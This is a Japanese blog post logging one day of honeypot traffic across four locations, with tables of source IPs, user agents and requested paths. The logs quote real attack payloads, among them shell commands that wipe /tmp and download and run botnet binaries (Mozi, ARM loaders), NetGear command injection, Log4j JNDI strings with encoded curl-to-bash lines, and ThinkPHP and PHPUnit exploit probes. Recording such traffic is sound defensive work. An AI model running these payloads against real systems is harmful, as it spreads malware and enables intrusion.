2021/12/31 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/12/31分です。

特徴

共通

gbrmssによるスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
85.206.160.115に関する不正通信

を確認しました。

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
aiohttpによるスキャン行為
.cssへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
Gh0stRATのような動き

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  212.192.216.45/bins/arm;
chmod 777 /tmp/arm;
sh /tmp/arm selfrep.jaws

cd /tmp;
rm -rf *;
wget  212.192.216.46/bins/arm;
chmod 777 /tmp/arm;
sh /tmp/arm selfrep.jaws

cd /tmp;
rm -rf *;
wget  212.192.216.71/bins/arm;
chmod 777 /tmp/arm;
sh /tmp/arm selfrep.jaws

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
okhttpによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd+/tmp;
rm+-rf+*;
wget+ 212.192.216.46/bins/arm;
chmod+777+/tmp/arm;
sh+/tmp/arm+selfrep.jaws

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：174 (前日比：65)
US：総アクセス数：106 (前日比：38)
UK：総アクセス数：45 (前日比：-7)
SG：総アクセス数：544 (前日比：472)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.121.38	Romania
2	20.102.81.95	United States
1	23.101.168.122	United States
1	23.183.82.177	United States
1	34.237.243.82	United States
1	40.121.67.45	United States
13	43.132.160.145	Singapore
1	45.61.188.222	United States
17	45.95.169.230	Croatia
1	45.143.200.118	Russia
8	47.252.35.224	United States
40	54.173.225.97	United States
1	58.249.82.19	China
1	87.121.52.88	Bulgaria
2	88.247.102.196	Turkey
3	89.248.165.52	United Kingdom
12	92.118.234.202	Latvia
1	100.26.250.76	United States
1	109.237.103.123	Russia
1	115.55.92.116	China
2	135.125.217.54	France
10	135.125.246.110	France
1	143.198.55.184	United States
1	144.126.209.23	United States
2	157.245.70.127	United States
1	159.203.32.101	United States
1	163.172.227.28	United Kingdom
2	165.232.137.148	United States
1	165.232.142.210	United States
32	172.104.140.107	United States
2	185.254.196.217	Ukraine
5	185.254.196.218	Ukraine
1	192.241.212.209	United States
1	192.241.212.227	United States
1	193.29.13.29	Romania
1	209.17.96.10	United States
1	209.141.53.74	United States

UserAgent一覧

件数	UserAgent
27	`-`
12	`Go-http-client/1.1`
1	`Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
17	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36`
40	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
4	`Mozilla/5.0 (compatible;)`
2	`Mozilla/5.0 zgrab/0.x`
30	`curl/7.54.0`
2	`curl/7.75.0`
1	`gbrmss/7.29.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
2		`\x03`
1		`\x16\x03\x01\x01\x9c\x01`
2		`\x16\x03\x01\x01\xa6\x01`
1		`\x16\x03\x01\x01\xb3\x01`
1		`\x16\x03\x01\x01\xfa\x01`
4		`\x16\x03\x01\x02`
3		`\x16\x03\x01`
1		`\x16\x03\x02\x01\x99\x01`
1		`\x16\x03\x03\x01G\x01`
1		`\x16\x03\x03\x01U\x01`
1		`\x16\x03\x03\x01\x98\x01`
2		`\x16\x03\x03\x01\xa4\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
30	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/2019/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2020/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/AlFi`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/HNAP1/`	HTTP/1.1
2	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin.jhtml`	HTTP/1.1
1	GET	`/admin.pl`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/auth/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base.inc`	HTTP/1.1
1	GET	`/base.jhtml`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/cli/.env`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/config/.env`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/default.aspx`	HTTP/1.1
1	GET	`/default.pl`	HTTP/1.1
1	GET	`/dependencies/.env`	HTTP/1.1
1	GET	`/deployment/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/document/.env`	HTTP/1.1
1	GET	`/engine/.env`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/framework/.env`	HTTP/1.1
1	GET	`/frontend/.env`	HTTP/1.1
1	GET	`/getCommand?guid=SD-walker-pc-walker`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.aspx`	HTTP/1.1
1	GET	`/index.cfm`	HTTP/1.1
1	GET	`/inicio.jsp`	HTTP/1.1
2	GET	`/java_script/template_1/game.js?v=1`	HTTP/1.1
1	GET	`/laravel-artisa/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login/.env`	HTTP/1.1
1	GET	`/main.cfm`	HTTP/1.1
1	GET	`/master/.env`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/nmaplowercheck1640877168`	HTTP/1.1
1	GET	`/personal/.env`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/project/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/search/.env`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//58[.]249[.]82[.]19:46444/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/start.jsp`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/text4041640851899`	HTTP/1.1
1	GET	`/vod_installer/.env`	HTTP/1.1
1	GET	`/vue/.env`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
12	GET	`http[:]//azenv[.]net/`	HTTP/1.1
1	GET	`http[:]//www[.]msftncsi[.]com/ncsi.txt`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/index.htm`	HTTP/1.1
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
2	POST	`/sdk`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.121.38	Romania
1	3.144.122.77	United States
34	20.110.97.101	United States
2	20.119.227.45	United States
1	37.49.225.132	Belize
1	43.247.160.182	India
1	45.61.185.69	United States
6	51.79.29.48	Canada
1	51.81.193.228	United States
1	58.248.193.72	China
4	71.6.135.131	United States
1	89.163.242.196	Germany
13	92.118.234.202	Latvia
1	104.128.188.248	United States
1	109.237.103.123	Russia
6	137.184.221.114	United States
1	143.110.227.92	United States
1	143.198.55.184	United States
1	144.126.209.23	United States
1	147.182.195.163	United States
2	157.245.70.127	United States
1	164.92.215.114	United States
1	172.104.138.223	United States
1	185.107.195.5	Germany
2	185.180.143.138	Portugal
1	193.29.13.29	Romania
14	195.54.160.149	Russia
1	199.195.254.63	United States
1	209.17.96.218	United States
1	209.17.97.50	United States
2	209.141.53.74	United States

UserAgent一覧

件数	UserAgent
1	`${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo}`
11	`-`
13	`Go-http-client/1.1`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))`
1	`Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
13	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
34	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Python/3.7 aiohttp/3.7.4.post0`
1	`gbrmss/7.29.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01\xfb\x01`
2		`\x16\x03\x01`
24	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
2	GET	`/2019/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/2020/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC42OC4xMTguODM6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzQuNjguMTE4LjgzOjgwKXxiYXNo}`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.1
2	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
2	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fuN3`	HTTP/1.0
1	GET	`/fuel/modules/fuel/assets/css/fuel.css`	HTTP/1.1
1	GET	`/fuel`	HTTP/1.1
2	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/java_script/template_1/game.js?v=1`	HTTP/1.1
2	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
2	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/xmlrpc.php?rsd`	HTTP/1.1
13	GET	`http[:]//azenv[.]net/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.121.38	Romania
1	5.188.210.227	Russia
1	42.224.34.115	China
1	45.61.187.180	United States
1	45.61.188.24	United States
1	45.143.200.118	Russia
2	46.107.94.204	Hungary
1	66.240.205.34	United States
3	89.248.165.52	United Kingdom
12	92.118.234.202	Latvia
2	94.232.43.63	Russia
2	157.245.70.127	United States
1	157.245.207.127	United States
1	172.105.28.198	United States
1	172.105.152.112	United States
1	182.114.86.211	China
1	193.29.13.29	Romania
8	195.54.160.149	Russia
1	198.98.49.124	United States
1	198.199.92.190	United States
1	203.206.188.109	Australia
1	212.192.216.39	Czechia

UserAgent一覧

件数	UserAgent
1	`${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=}`
18	`-`
12	`Go-http-client/1.1`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/27.0.155813979 Mobile/14E304 Safari/602.1`
1	`Mozilla/5.0 zgrab/0.x`
1	`gbrmss/7.29.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`Gh0st\xad`
4		`\x03`
1		`\x16\x03\x01\x01\xfc\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzIuMTQ1LjY2LjM0OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzMi4xNDUuNjYuMzQ6ODApfGJhc2g=}`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.1
1	GET	`/admin/index.php?login`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/java_script/template_1/game.js?v=1`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.46/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws`
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.71/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws`
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
12	GET	`http[:]//azenv[.]net/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.57.121.38	Romania
5	23.236.147.154	Canada
1	45.61.185.69	United States
1	45.61.188.222	United States
1	45.143.200.118	Russia
5	51.79.29.48	Canada
1	60.183.151.200	China
1	69.162.231.10	United States
3	89.248.165.52	United Kingdom
12	92.118.234.202	Latvia
2	94.232.43.63	Russia
1	103.209.254.94	Japan
1	103.209.254.95	Japan
10	106.15.225.180	China
14	107.172.73.224	United States
1	120.86.254.194	China
1	121.5.145.96	China
456	123.58.210.77	Hong Kong
1	143.244.189.0	United States
1	147.182.195.163	United States
1	147.182.232.128	United States
2	157.230.216.203	United States
1	159.223.169.4	United States
3	163.172.168.251	United Kingdom
1	185.136.167.62	Germany
1	189.48.190.103	Brazil
1	192.241.200.251	United States
1	192.241.207.100	United States
1	193.23.3.121	Russia
1	193.29.13.29	Romania
9	195.54.160.149	Russia
1	198.98.49.124	United States
1	209.17.96.50	United States
1	209.141.53.74	United States

UserAgent一覧

件数	UserAgent
1	`${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo}`
129	`-`
13	`Go-http-client/1.1`
1	`Hello, world`
1	`Java/1.8.0_311`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)`
1	`Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)`
1	`Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36`
339	`Mozilla/5.0 (Linux; Android 8.1; EML-L29 Build/HUAWEIEML-L29; xx-xx) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36 (iPad; iPhone; CPU iPhone OS 13_2_3 like Mac OS X)`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2; rv:52.8.0) Gecko/20100101 Firefox/52.8.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
14	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36`
9	`Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)`
11	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 zgrab/0.x`
1	`gbrmss/7.29.0`
4	`okhttp/3.3.1`

リクエスト内容一覧

件数	Method	Request	Protocol
115		`-`
4		`\x03`
1		`\x16\x03\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	CONNECT	`emby[.]media:443`	HTTP/1.1
1	CONNECT	`www[.]bing[.]com:443`	HTTP/1.1
11	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/202110/images/public.css`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo}`	HTTP/1.1
1	GET	`/Content/Wap/base.css`	HTTP/1.1
1	GET	`/Content/favicon.ico`	HTTP/1.1
1	GET	`/Content/m_1/js/m_1_Jquery.js`	HTTP/1.1
1	GET	`/Css/Hm.css`	HTTP/1.1
1	GET	`/Home/Bind/binding`	HTTP/1.1
2	GET	`/Home/GetAllGameCategory`	HTTP/1.1
1	GET	`/JS/loginstatus.js`	HTTP/1.1
2	GET	`/Pc/Lang/index.html`	HTTP/1.1
1	GET	`/Public/Home/ecshe_css/main.css?v=1543997196`	HTTP/1.1
1	GET	`/Public/Home/js/cls.js`	HTTP/1.1
2	GET	`/Public/Home/js/common.js`	HTTP/1.1
2	GET	`/Public/Mobile/ecshe_css/wapmain.css?v=1545408652`	HTTP/1.1
2	GET	`/Public/Wchat/css/index.css`	HTTP/1.1
1	GET	`/Public/css/errorCss.css`	HTTP/1.1
2	GET	`/Public/home/common/js/index.js`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/Public/home/js/fukuang.js`	HTTP/1.1
1	GET	`/Public/home/wap/css/qdgame.css`	HTTP/1.1
1	GET	`/Public/initJs.php`	HTTP/1.1
1	GET	`/Public/uploads/web/step1.png`	HTTP/1.1
1	GET	`/Recruit/download_url`	HTTP/1.1
2	GET	`/Res/font/font.css`	HTTP/1.1
1	GET	`/TP/html/public/index.php`	HTTP/1.1
